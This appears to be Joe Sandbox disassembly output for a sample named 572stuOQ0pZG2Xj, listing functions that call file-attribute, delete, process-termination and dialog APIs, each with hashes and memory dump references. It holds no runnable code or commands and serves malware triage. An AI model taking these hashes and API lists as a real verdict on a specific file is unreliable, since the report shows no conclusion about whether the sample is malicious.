std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64D342077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64D342093

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
Instruction ID: 0b2ac8d5062510f68024e54012229b94c797f3a846f741936ce84f56df5e6ae9
Opcode Fuzzy Hash: ed06525d720d284fc54222632f53f2fcbb29030dbea5caf8b24800418b5d5b0f
Instruction Fuzzy Hash: 7831F512E0CA8691FB66F710E4443B9E3E0FB42B84F544031D24C929A9EF7DE946C301

Function 00007FF64D333D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF64D3407E1), ref: 00007FF64D333D5E
SetFileAttributesW.KERNEL32 ref: 00007FF64D333DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D333E1A

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction ID: 4ae06e9e8a47726936b97b4a922b26b624866f5d998b8684541b78f50f861041
Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction Fuzzy Hash: 2521C862E1CA8181EE21BB25E45526DA361FF8AB94F505230EA9E86AD5FF3CD540C600

Function 00007FF64D3331BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF64D340822), ref: 00007FF64D3331E7
DeleteFileW.KERNEL32 ref: 00007FF64D333237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3332A1

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction ID: c3f38c4bdb51f509764b524e19eef4859d8c8cacc7c09ab76f25a1374924f0f3
Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction Fuzzy Hash: 17219B62E1C78181EE11BB25F55516EA360FF8ABD4F505234EA9DC6AD5EF3CD540C700

Function 00007FF64D3332BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF64D33E5B1,?,?,?,00000000,?), ref: 00007FF64D3332E7
GetFileAttributesW.KERNELBASE ref: 00007FF64D333334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D333399

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction ID: 600ba852df9420f4a692dfb9c34382732e2dc3d99ab30f59f1b25a02feda4c41
Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction Fuzzy Hash: D0217462E1CA8181EE15BB29F54412DA361FB8A7A4F505231EA9D87BE5EF3CD540C604

Function 00007FF64D35BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF64D35BF48), ref: 00007FF64D35BF8C
TerminateProcess.KERNEL32(?,?,?,00007FF64D35BF48), ref: 00007FF64D35BF97
ExitProcess.KERNEL32 ref: 00007FF64D35BFA6

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: f8d87a6d90d61bfb374c78a2e3619f66752803be22faa84089699d205e61a143
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 1BE04F29F0C70686EB657B3198A537DA3626F9AB41F105478D80E833D6EE3DA4098700

Function 00007FF64D32F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D32F89B

Part of subcall function 00007FF64D333EC8: FindClose.KERNELBASE(?,?,00000000,00007FF64D340811), ref: 00007FF64D333EFD

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction ID: 5ff81ea6fe61129335c28b556d9f08573cb90f285c984efc22f8534960a2fdf5
Opcode Fuzzy Hash: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction Fuzzy Hash: D391B073E1CB8190EB11FB25D8402EDA361FB86798F904136EA5C87AE9EF78D545C340

Function 00007FF64D323904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D323AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D323AB9

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction ID: b1213aa503bfa5511c589a6c610b5e2a1766f9caae742801879de97209aee9b0
Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction Fuzzy Hash: C741C362F1C65184FF02FBB1D4502EDA361AF46BD8F145239DE1DA7ADAEE38D4828340

Function 00007FF64D332778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF64D33274D), ref: 00007FF64D3328A9
GetLastError.KERNEL32(?,00007FF64D33274D), ref: 00007FF64D3328B8

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: ee2ae97dc55a36a8e4b1ed7ca4a0707ebf505197e4984559590acf2168bfc1f6
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: F331C526F1DA5683EA62BB2ADA4067DA350AF06BD4F145131DE5D8BB90FE3CD4818740

Function 00007FF64D3222BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF64D3222F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF64D3223F0

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction ID: e899db0d9c30b651e1aef4c5f3365c207e676ba13d9ea7d4e04b16948cf99983
Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction Fuzzy Hash: 5A31C122E1C74582EA21FB15F8443AEF360EB86794F445235EB9C4BB95EF3CE5408744

Function 00007FF64D332AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF64D332AFE
SetFileTime.KERNELBASE ref: 00007FF64D332B9B

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: 81ca5889abb0e598171d8e18b5ae659dd11855c23d74d82a32ff43f6ba99397a
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: 3521B026E0DB4259EA63FF11D6047BA9790AF03794F154131DE4C46A95FEBCE886C200

Function 00007FF64D352C80 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_set_fmode.LIBCMT ref: 00007FF64D352C97
_RTC_Initialize.LIBCMT ref: 00007FF64D352CB8

Part of subcall function 00007FF64D35C2C0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64D35C2EA

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
Instruction ID: ec3a413c31fc0aa1096f38365b95a7ed92f9ddb17d37035c23be5583dc78c172
Opcode Fuzzy Hash: e8e9d160ec1903a932a5a39018fe25c36d4ba16f106dc0af14eb3e24c8a7c370
Instruction Fuzzy Hash: 9711DD65E1D24341FE57B3B448762FDC2815FA3348F850434E92DC62C3FD2CB89586A2

Function 00007FF64D33AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF64D33AB67
LoadStringW.USER32 ref: 00007FF64D33AB80

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: b2b05a2a7eb15132321ef81a69e5a047251b61ae9b0b50643d2da887e6016b1f
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 14114971F0C64186EA42BF16A980169F7A1BB8AFC0F544535DA1EE3B20FE7CE5418344

Function 00007FF64D332BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF64D332C11
GetLastError.KERNEL32 ref: 00007FF64D332C1E

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: aeec7b88bb653e333aba585a407803c41648607d0f715c0fbe3fce553a450036
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: B311A225E0C64181EB62FB25E980279A260FB46BB4F544331DA7D826E4EF3CD582C300

Function 00007FF64D32255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64D33A4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF64D33A504
Part of subcall function 00007FF64D33A4AC: SetDlgItemTextW.USER32 ref: 00007FF64D33A573
Part of subcall function 00007FF64D33A4AC: GetWindowRect.USER32 ref: 00007FF64D33A5AD
Part of subcall function 00007FF64D33A4AC: GetClientRect.USER32 ref: 00007FF64D33A5BB

GetDlgItem.USER32 ref: 00007FF64D3225AC
SetDlgItemTextW.USER32 ref: 00007FF64D3225C8

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Item$RectText$ClientWindowswprintf
String ID:
API String ID: 402765569-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: ef57ac05a55aa9543d219f752d942e76b8d2eb4bbf147314635f15ec31934ec7
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: DD012124E0D64A41FF5BB752A8582B9D7916F8778CF188435D84DC67DAFE2CE884C340

Function 00007FF64D33EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64D33EBAD,?,?,?,?,00007FF64D335752,?,?,?,00007FF64D3356DE), ref: 00007FF64D33EB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF64D33EB6F

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: 69889235bfdf95df8162ee5352116f615b5b11b2c275dbb42e07f51fbe87e768
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: 9EE02B71F1C58A82DF1ABF55C4504EDB392BFC9B40B849135E60BC3A14FE2CE1458B00

Function 00007FF64D3521D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D352200

Part of subcall function 00007FF64D352F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64D352F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64D352206

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
Instruction ID: f676647c1ac6f8ec6886947822870d604b21b375abe33a561fd0869c3afbf239
Opcode Fuzzy Hash: c507040392a2377e4895e65205c3b95c5fe2146e3485fc393c80d7c2ffdcaf26
Instruction Fuzzy Hash: 1BE01249E0E10741FD5BB27219361B680400F1B3B4E5C5730DE3EC56C3BD5CB591C250

Function 00007FF64D35D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF64D35D922
GetLastError.KERNEL32 ref: 00007FF64D35D934

Memory Dump Source

Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true

Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: 6c6abf336bd28e4ff242ae02a8d9ed5b893e1ef03703c3e727606e3c446c4cba
